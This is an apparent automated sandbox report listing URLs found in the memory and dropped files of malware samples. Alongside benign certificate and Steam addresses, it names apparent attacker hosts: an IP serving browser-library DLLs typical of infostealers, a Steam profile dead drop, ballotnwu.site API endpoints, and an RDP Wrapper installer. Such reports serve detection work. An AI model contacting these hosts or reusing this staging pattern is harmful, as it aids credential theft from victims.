Source: file.exe, 66f5db9e54794_vfkagks[1].exe.6.dr, BKKFCFBKFC.exe.6.dr, GIEHJDHCBA.exe.6.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe, 66f5db9e54794_vfkagks[1].exe.6.dr, BKKFCFBKFC.exe.6.dr, GIEHJDHCBA.exe.6.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 66f5db9e54794_vfkagks[1].exe.6.dr, BKKFCFBKFC.exe.6.dr, GIEHJDHCBA.exe.6.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 66f5db9e54794_vfkagks[1].exe.6.dr, mozglue.dll.6.dr, BKKFCFBKFC.exe.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, GIEHJDHCBA.exe.6.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 66f5db9e54794_vfkagks[1].exe.6.dr, BKKFCFBKFC.exe.6.dr, GIEHJDHCBA.exe.6.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: GIEHJDHCBA.exe, 0000000C.00000002.1965404237.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.mic
Source: CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000035EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hansgborn.eu
Source: CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000035EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hansgborn.eud
Source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 66f5db9e54794_vfkagks[1].exe.6.dr, mozglue.dll.6.dr, BKKFCFBKFC.exe.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, GIEHJDHCBA.exe.6.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 66f5db9e54794_vfkagks[1].exe.6.dr, mozglue.dll.6.dr, BKKFCFBKFC.exe.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, GIEHJDHCBA.exe.6.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, 66f5db9e54794_vfkagks[1].exe.6.dr, BKKFCFBKFC.exe.6.dr, GIEHJDHCBA.exe.6.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe, 66f5db9e54794_vfkagks[1].exe.6.dr, BKKFCFBKFC.exe.6.dr, GIEHJDHCBA.exe.6.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: CFHIIEHJKK.exe, 00000014.00000002.2475522299.0000000003040000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: CFHIIEHJKK.exe, 00000014.00000002.2475522299.0000000003040000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000030A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RDPWInst.exe, 0000001E.00000002.2111451674.0000000000401000.00000020.00000001.01000000.00000010.sdmp, RDPWInst.exe.20.dr	String found in binary or memory: http://stascorp.com/load/1-1-0-62
Source: CFHIIEHJKK.exe, 00000014.00000002.2475649051.000000000316A000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 0000001E.00000000.2066012976.0000000000450000.00000002.00000001.01000000.00000010.sdmp, rdpwrap.dll.30.dr, RDPWInst.exe.20.dr	String found in binary or memory: http://stascorp.comDVarFileInfo$
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: RDPWInst.exe, 0000001E.00000000.2066012976.0000000000450000.00000002.00000001.01000000.00000010.sdmp, RDPWInst.exe.20.dr	String found in binary or memory: http://www.apache.org/licenses/
Source: RDPWInst.exe, 0000001E.00000000.2066012976.0000000000450000.00000002.00000001.01000000.00000010.sdmp, RDPWInst.exe.20.dr	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 66f5db9e54794_vfkagks[1].exe.6.dr, mozglue.dll.6.dr, BKKFCFBKFC.exe.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, GIEHJDHCBA.exe.6.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, 66f5db9e54794_vfkagks[1].exe.6.dr, BKKFCFBKFC.exe.6.dr, GIEHJDHCBA.exe.6.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: RegAsm.exe, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2148470094.000000006FA8D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.6.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000006.00000002.2077646986.00000000202FD000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2070721006.000000001A35C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199780418869[1].htm.19.dr	String found in binary or memory: https://5.75.211.162
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.000000000148B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/
Source: RegAsm.exe, 00000013.00000002.2456368486.000000000148B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/LS
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/R
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/freebl3.dll
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/freebl3.dlll
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/mozglue.dll
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/mozglue.dllf
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/msvcp140.dll
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/nss3.dlla
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/nss3.dllz
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/softokn3.dll
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/softokn3.dllp
Source: RegAsm.exe, 00000013.00000002.2453119185.000000000055E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/sqlp.dll
Source: RegAsm.exe, 00000006.00000002.2061826674.000000000125F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/vcruntime140.dll
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/vcruntime140.dllM
Source: RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.1620.5938.134
Source: RegAsm.exe, 00000013.00000002.2453119185.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.16214d953f2846xe
Source: RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162IDGCB
Source: RegAsm.exe, 00000013.00000002.2453119185.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162KJEHD
Source: RegAsm.exe, 00000013.00000002.2453119185.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000045D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162pData
Source: EHJDGC.6.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: 76561199780418869[1].htm.19.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: RegAsm.exe, 00000010.00000002.2096077278.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2095280392.000000000149A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site//
Source: RegAsm.exe, 00000010.00000002.2095280392.000000000149A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/X
Source: RegAsm.exe, 00000010.00000002.2096077278.00000000014F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/api
Source: RegAsm.exe, 00000010.00000002.2095280392.000000000149A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/apipi~
Source: RegAsm.exe, 00000006.00000002.2061826674.000000000125F000.00000004.00000020.00020000.00000000.sdmp, AEHIDA.6.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: RegAsm.exe, 00000006.00000002.2061826674.000000000125F000.00000004.00000020.00020000.00000000.sdmp, AEHIDA.6.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: RegAsm.exe, 00000010.00000002.2096077278.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: EHJDGC.6.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: EHJDGC.6.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: EHJDGC.6.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000010.00000002.2096077278.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: RegAsm.exe, 00000010.00000002.2096077278.00000000014C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.s
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: RegAsm.exe, 00000013.00000002.2453119185.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
